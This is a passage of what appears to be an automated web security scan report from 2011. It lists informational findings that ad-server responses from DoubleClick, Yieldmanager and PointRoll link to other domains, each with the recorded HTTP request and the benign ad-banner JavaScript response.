document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/y;243217805;0-0;2;67592558;3454-728/90;33967937/33985815/1;u=,cm-10101735942_1311273740,11fda490648f83c,noc,a
...[SNIP]...
1273740,11fda490648f83c,noc,ax.60-cm.games_h-bz.25;;cmw=nowl;sz=728x90;net=cm;env=ifr;ord1=504647;contx=noc;an=60;dc=w;btg=cm.games_h;btg=bz.25;~aopt=2/1/e4/0;~sscs=%3fhttp://www.questionsprotect.org"><img src="http://s0.2mdn.net/viewad/2523939/207384/adc_predlend_fear_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.28. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10102582501_1311273797,11fda490648f83c,noc,ax.1-cm.games_h-bz.25;;cmw=nowl;sz=300x250;net=cm;env=ifr;ord1=539707;contx=noc;an=1;dc=w;btg=cm.games_h;btg=bz.25;ord=1710082305?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2523939/207384/adc_predlend_fear_300x250.jpg

Request

GET /adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10102582501_1311273797,11fda490648f83c,noc,ax.1-cm.games_h-bz.25;;cmw=nowl;sz=300x250;net=cm;env=ifr;ord1=539707;contx=noc;an=1;dc=w;btg=cm.games_h;btg=bz.25;ord=1710082305? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=300x250&site=MYB
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 590
Date: Thu, 21 Jul 2011 18:43:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/c;243217806;0-0;1;67592558;4307-300/250;33967934/33985812/1;u=,cm-10102582501_1311273797,11fda490648f83c,noc,
...[SNIP]...
11273797,11fda490648f83c,noc,ax.1-cm.games_h-bz.25;;cmw=nowl;sz=300x250;net=cm;env=ifr;ord1=539707;contx=noc;an=1;dc=w;btg=cm.games_h;btg=bz.25;~aopt=2/1/e4/0;~sscs=%3fhttp://www.questionsprotect.org"><img src="http://s0.2mdn.net/viewad/2523939/207384/adc_predlend_fear_300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.29. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/interactive.wsj.com/markets_story

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;p39=223;p39=234;p39=220;p39=233;p39=227;;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8194819481948194;

The response contains the following link to another domain:

http://view.atdmt.com/INV/view/283426202/direct/01/1547205

Request

GET /adj/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;p39=223;p39=234;p39=220;p39=233;p39=227;;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8194819481948194; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;p39=223;p39=234;p39=220;p39=233;p39=227;;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8194819481948194;
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1746
Date: Sat, 23 Jul 2011 04:32:01 GMT

document.write('<iframe src=\"http://view.atdmt.com/INV/iview/283426202/direct/01/1547205?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4d/3/0/%2a/i%3B243226286%3B0-0%3B0%3B15066911%3B4307-300/250%
...[SNIP]...
%3D220%3Bp39%3D233%3Bp39%3D227%3B%3Bmc%3Db2pfreezone%3Btile%3D5%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D7/1/ff/1%3B%7Esscs%3D%3fhttp://clk.atdmt.com/INV/go/283426202/direct/01/1547205" target="_blank"><img src="http://view.atdmt.com/INV/view/283426202/direct/01/1547205"/></a>
...[SNIP]...

18.30. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lfs2.lifescript/conditions

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=5;sz=300x100;ord=101352252258050?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2041144/300x100_hn_diabetes.gif

Request

GET /adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=5;sz=300x100;ord=101352252258050? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=5;sz=300x100;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 521
Date: Thu, 21 Jul 2011 19:23:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/l;208943980;0-0;0;31210306;3823-300/100;41112874/41130661/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=5;~sscs=%3fhttp://video.healthination.com/lifescript/diabetes.html"><img src="http://s0.2mdn.net/viewad/2041144/300x100_hn_diabetes.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.31. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lqm.codeplex.site/C-rawr

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr;kw=wow%2CRawr%2CWorld%20of%20Warcraft%2C%3C%3Fxml%20version%3D%221.0%22%2C%20%20%20tools%2C%20tools%2C.NET%2CActive%20Record%2CBear%2Cblackstorm;sz=300x250;tile=1;ord=3B244E7108996F8EDF3CF2FC28C5CE52?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3199375/Infragistics_300x250_SLDataGrid.jpg

Request

GET /adj/lqm.codeplex.site/C-rawr;kw=wow%2CRawr%2CWorld%20of%20Warcraft%2C%3C%3Fxml%20version%3D%221.0%22%2C%20%20%20tools%2C%20tools%2C.NET%2CActive%20Record%2CBear%2Cblackstorm;sz=300x250;tile=1;ord=3B244E7108996F8EDF3CF2FC28C5CE52? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 364
Date: Sat, 23 Jul 2011 04:47:05 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/o;243024008;1-0;0;66894065;4307-300/250;42827918/42845705/1;;~sscs=%3fhttp://www.infragistics.com/redirects/ASP-AlliancevMay11-300x250-SL-DG"><img src="http://s0.2mdn.net/viewad/3199375/Infragistics_300x250_SLDataGrid.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.32. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lqm.codeplex.site/C-rawr

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr;kw=wow%2CRawr%2CWorld%20of%20Warcraft%2C%3C%3Fxml%20version%3D%221.0%22%2C%20%20%20tools%2C%20tools%2C.NET%2CActive%20Record%2CBear%2Cblackstorm;sz=300x250;tile=1;ord=A2616E556EB43DD216EE0A5CBC0F2A61?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3229903/Winhost_300x250_JumbledText.gif

Request

GET /adj/lqm.codeplex.site/C-rawr;kw=wow%2CRawr%2CWorld%20of%20Warcraft%2C%3C%3Fxml%20version%3D%221.0%22%2C%20%20%20tools%2C%20tools%2C.NET%2CActive%20Record%2CBear%2Cblackstorm;sz=300x250;tile=1;ord=A2616E556EB43DD216EE0A5CBC0F2A61? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 339
Date: Sat, 23 Jul 2011 04:48:21 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/q;243224748;0-0;0;66894065;4307-300/250;42945600/42963387/1;;~sscs=%3fhttp://www.discountasp.net/tfs/go/go.aspx?i=16156"><img src="http://s0.2mdn.net/viewad/3229903/Winhost_300x250_JumbledText.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.33. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 309
Date: Sat, 23 Jul 2011 04:42:22 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.34. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/pg_viewvc_p88_shortrec

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 288
Date: Sat, 23 Jul 2011 04:42:37 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/d;44306;0-0;0;30748661;31-1/1;0/0/0;;~okv=;pg=viewvc;tile=1;tpc=hoytllc-vcloud;sz=1x1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.35. http://ad.doubleclick.net/adj/scmag.hmktus/sc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scmag.hmktus/sc

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=101;tile=2;sz=728x90,468x60;ord=907953021859604900?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3020433/PaloAlto72890.GIF

Request

GET /adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=101;tile=2;sz=728x90,468x60;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 338
Date: Fri, 22 Jul 2011 20:14:11 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4c/0/0/%2a/c;243199348;0-0;0;37430148;3454-728/90;42734363/42752150/1;;~sscs=%3fhttp://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag"><img src="http://s0.2mdn.net/viewad/3020433/PaloAlto72890.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.36. http://ad.doubleclick.net/adj/scmag.hmktus/sc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scmag.hmktus/sc

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 247
Date: Fri, 22 Jul 2011 20:14:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4c/0/0/%2a/t;44306;0-0;0;37430148;1412-640/480;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.37. http://ad.doubleclick.net/adj/scmag.hmktus/sc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/scmag.hmktus/sc

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=801;tile=3;sz=980x30,1x1;ord=907953021859604900?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2294572/Nom_980x30_scjun11.gif

Request

GET /adj/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=801;tile=3;sz=980x30,1x1;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 348
Date: Fri, 22 Jul 2011 20:14:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4c/0/0/%2a/e;242418602;0-0;0;37430148;13722-980/30;42593846/42611633/1;;~sscs=%3fhttp://www.scmagazineus.com/sc-magazine-awards-2012/section/2199/"><img src="http://s0.2mdn.net/viewad/2294572/Nom_980x30_scjun11.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.38. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/pixel?&id=1383274&id=698998&id=1282674&id=1361950&id=1198834&id=1342492&id=1198835&id=1239839&id=939893&id=1224511&id=1216952&id=1095717&id=1268278&id=1050626&id=1294447&id=1253950&id=950991&id=1283938&id=956405&id=1349763&id=1357445&id=1320775&id=1210932&id=956404&id=1250690&t=1

The response contains the following links to other domains:

http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&guid=ON&script=0

Request

GET /pixel?&id=1383274&id=698998&id=1282674&id=1361950&id=1198834&id=1342492&id=1198835&id=1239839&id=939893&id=1224511&id=1216952&id=1095717&id=1268278&id=1050626&id=1294447&id=1253950&id=950991&id=1283938&id=956405&id=1349763&id=1357445&id=1320775&id=1210932&id=956404&id=1250690&t=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: bh="b!!!!5!#+di!!!!#=-0R1!#+dj!!!!#=-0R1!#+dk!!!!#=-0R1!#8TD!!!!#=-0_S!#?dj!!!!#=-0PM!#?dk!!!!#=-0PM!#LLe!!!!$=-0TC!#Pd7!!!!$=-0TE!#`_k!!!!#=-0PM!#xbd!!!!$=-0Tk!$!]L!!!!#=-0_R!$(0C!!!!$=-0TC!$)ZR!!!!#=-0_S!$*P^!!!!#=-@vp!$.#F!!!!#=-0PQ!$/ss!!!!#=-0PK!$2?y!!!!#=-0[f!$5)@!!!!#=-0_S"; uid=uid=8df62d6c-b39c-11e0-96a4-9fb0e9d10453&_hmacv=1&_salt=3883473224&_keyid=k1&_hmac=83701f11382411aa2cb44f186bb0d47fd160adef

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:14 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!O!#+di!!!!#=-0R1!#+dj!!!!#=-0R1!#+dk!!!!#=-0R1!#.dO!!!!$=-E1e!#8TD!!!!#=-0_S!#?dj!!!!#=-0PM!#?dk!!!!#=-0PM!#LLe!!!!$=-0TC!#Pd7!!!!$=-0TE!#Q*T!!!!$=-E1e!#RY.!!!!$=-E1e!#SCj!!!!$=-E1e!#SCk!!!!$=-E1e!#`_k!!!!#=-0PM!#aG>!!!!$=-E1e!#g[h!!!!$=-E1e!#ust!!!!$=-E1e!#usu!!!!$=-E1e!#wW9!!!!$=-E1e!#xI*!!!!$=-E1e!#xbd!!!!$=-0Tk!#yM#!!!!$=-E1e!$!]L!!!!#=-0_R!$#WA!!!!$=-E1e!$%,!!!!!$=-E1e!$%SB!!!!$=-E1e!$(0C!!!!$=-0TC!$(Qs!!!!$=-E1e!$)ZR!!!!#=-0_S!$*P^!!!!#=-@vp!$*Q<!!!!$=-E1e!$*a0!!!!$=-E1e!$,0h!!!!$=-E1e!$.#F!!!!#=-0PQ!$/iQ!!!!$=-E1e!$/ss!!!!#=-0PK!$2?y!!!!#=-0[f!$2j$!!!!$=-E1e!$3jT!!!!$=-E1e!$4ou!!!!$=-E1e!$5)@!!!!#=-0_S!$5Nu!!!!$=-E1e!$8Jj!!!!$=-E1e"; path=/; expires=Mon, 22-Jul-2013 04:49:14 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 04:49:14 GMT
Pragma: no-cache
Content-Length: 530
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://ad.yieldmanager.com/pixel?id=1364633&t=2" />
...[SNIP]...

18.39. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1355335H75620110715143929&flash=0&time=4|13:42|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/a%3B243851526%3B0-0%3B0%3B67592558%3B2321-160/600%3B43168466/43186253/1%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.80-cm.games_h-bz.25%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.80-cm.games_h-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D141338%3Bcontx%3Dgames%3Ban%3D80%3Bdc%3Dw%3Bbtg%3Dcm.games_h%3Bbtg%3Dbz.25%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.9524185752163865

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/a;243851526;0-0;0;67592558;2321-160/600;43168466/43186253/1;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;~okv=;net=cm;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;;cmw=owl;sz=160x600;net=cm;ord1=141338;contx=games;an=80;dc=w;btg=cm.games_h;btg=bz.25;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1498970&c=1&i=98A80400-D9B5-CC6F-1309-E200007B0101&clickurl=http://ad.doubleclick.net/clk%3B243026625%3B67407714%3Bf%3Bpc=[TPAS_ID]%3Fhttp://www.ford.com/?referrer=FDAF-BannerAd%26bannerid=515935%7C67407714%7C243026625

Request

GET /PortalServe/?pid=1355335H75620110715143929&flash=0&time=4|13:42|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/a%3B243851526%3B0-0%3B0%3B67592558%3B2321-160/600%3B43168466/43186253/1%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.80-cm.games_h-bz.25%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.80-cm.games_h-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D141338%3Bcontx%3Dgames%3Ban%3D80%3Bdc%3Dw%3Bbtg%3Dcm.games_h%3Bbtg%3Dbz.25%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.9524185752163865 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: PRID=8C4BF8BD-922A-484A-B812-1B920D470E9E; PRbu=EomEAzaM9; PRvt=CBJ4gEqJghiCOa!B_BBe; PRgo=BBBAAuILBBVCFUE6; PRimp=98A80400-8821-9A23-1309-E200007E0101; PRca=|AK6u*2017:1|#; PRcp=|AK6uAA67:1|#; PRpl=|FgaO:1|#; PRcr=|GRmI:1|#; PRpc=|FgaOGRmI:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Jul 2011 18:42:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3244
Set-Cookie:PRvt=CBJ4gEqJi12W-M!B7BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=98A80400-D9B5-CC6F-1309-E200007B0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AK6u*2017:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
